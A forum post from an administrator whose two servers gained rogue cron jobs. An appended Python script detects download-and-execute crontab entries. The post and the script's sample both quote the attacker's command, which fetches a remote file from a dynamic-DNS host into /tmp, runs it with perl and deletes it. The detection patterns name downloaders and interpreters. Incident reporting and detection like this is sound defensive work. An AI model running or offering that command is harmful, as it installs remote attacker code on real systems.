I've got two dedicated servers that a few days ago started to send me notifications about unknown cron jobs running.
On both servers I've got secondary accounts for my websites and the hacker has modified the cron job for those accounts, not for root. So I think "maybe" they have only got limited access.
Both are trying to run the following: cd /tmp;wget http://fastfoodz.dlinkddns.com/abc.txt;curl -O http://fastfoodz.dlinkddns.com/abc.txt;perl abc.txt;rm -f abc*
Cronjob output from first server:
http://pastebin.com/m56ga6pp
Cronjob output from second server:
http://pastebin.com/4utZ8agC
The weird thing is that both servers seem hacked at the same time and by using the same method.
Has anyone had exactly this kind of hack and can give me ideas on how he got in and whether I can remove it without reinstalling?
There are plenty of websites on the servers, and the first one uses about 500GB that would take a lot to move somewhere else and reinstall.
Thanks in advance!
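The cron line quoted in the post follows a recognisable download-and-execute pattern (change into /tmp, fetch a remote file with wget/curl, run it through an interpreter, delete the artifacts). The following audit script, an added example that is not part of the original post, scans crontab text for that pattern so a similar entry can be caught on other accounts or servers. The sample crontab, the pattern names (DOWNLOADERS, INTERPRETERS, TEMP_DIRS, CLEANUP) and the audit_crontab function are this example's own; the suspicious sample line reproduces the command from the post.

```python
import re
import sys

# Constructed sample crontab text. Line 3 reproduces the command reported in the post;
# the other lines are ordinary entries that should not be flagged.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
*/5 * * * * cd /tmp;wget http://fastfoodz.dlinkddns.com/abc.txt;curl -O http://fastfoodz.dlinkddns.com/abc.txt;perl abc.txt;rm -f abc*
MAILTO=admin@example.invalid
@daily /usr/bin/certbot renew --quiet
"""

# A cron entry is either an @shortcut or five schedule fields, followed by the command.
CRON_ENTRY = re.compile(r'^\s*(?:@\w+\s+|(?:\S+\s+){5})(?P<cmd>.+)$')

# Heuristics that, in combination, describe a download-and-execute job.
DOWNLOADERS = re.compile(r'\b(wget|curl|fetch|lwp-download)\b')
INTERPRETERS = re.compile(r'(?:^|[\s;&|])(?:/\S*/)?(perl|python\d?|php|sh|bash|ruby)\s+\S+')
TEMP_DIRS = re.compile(r'(?:^|[;&|\s])cd\s+(/tmp|/var/tmp|/dev/shm)\b')
CLEANUP = re.compile(r'\brm\s+-r?f\b')
URL = re.compile(r'https?://\S+')


def split_commands(cmd):
    """Split a shell command line on ; & | so URLs and flags can be read per sub-command."""
    return [part.strip() for part in re.split(r'[;&|]+', cmd) if part.strip()]


def score_command(cmd):
    """Return the list of suspicious traits found in one cron command."""
    reasons = []
    if DOWNLOADERS.search(cmd):
        reasons.append('downloads remote content')
    if INTERPRETERS.search(cmd):
        reasons.append('executes script via interpreter')
    if TEMP_DIRS.search(cmd):
        reasons.append('works in world-writable temp dir')
    if CLEANUP.search(cmd):
        reasons.append('deletes its own artifacts')
    return reasons


def audit_crontab(text):
    """Return findings for entries that both fetch remote content and execute a script.

    Each finding records the crontab line number, the command, the traits matched and
    every URL the command references, which is what you want to block or investigate.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith('#'):
            continue
        match = CRON_ENTRY.match(line)
        if not match:
            continue  # environment assignment such as MAILTO=..., not a job
        cmd = match.group('cmd')
        reasons = score_command(cmd)
        if 'downloads remote content' in reasons and 'executes script via interpreter' in reasons:
            urls = [u for part in split_commands(cmd) for u in URL.findall(part)]
            findings.append({'line': lineno, 'command': cmd, 'reasons': reasons, 'urls': urls})
    return findings


if __name__ == '__main__':
    # Reads crontab text from stdin when given, otherwise audits the built-in sample.
    source = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_CRONTAB
    for finding in audit_crontab(source):
        print(f"line {finding['line']}: {', '.join(finding['reasons'])}")
        for url in finding['urls']:
            print(f"  fetches {url}")
```

To check every account on a server rather than the sample, pipe each user's crontab into the script (for example `crontab -l -u someuser | python3 audit_cron.py`) or the files under the cron spool directory. The script only reports an entry when it both downloads and executes, so ordinary jobs that merely call curl for a health check, or run a local script, are not flagged; the temp-dir and cleanup traits are recorded as supporting evidence.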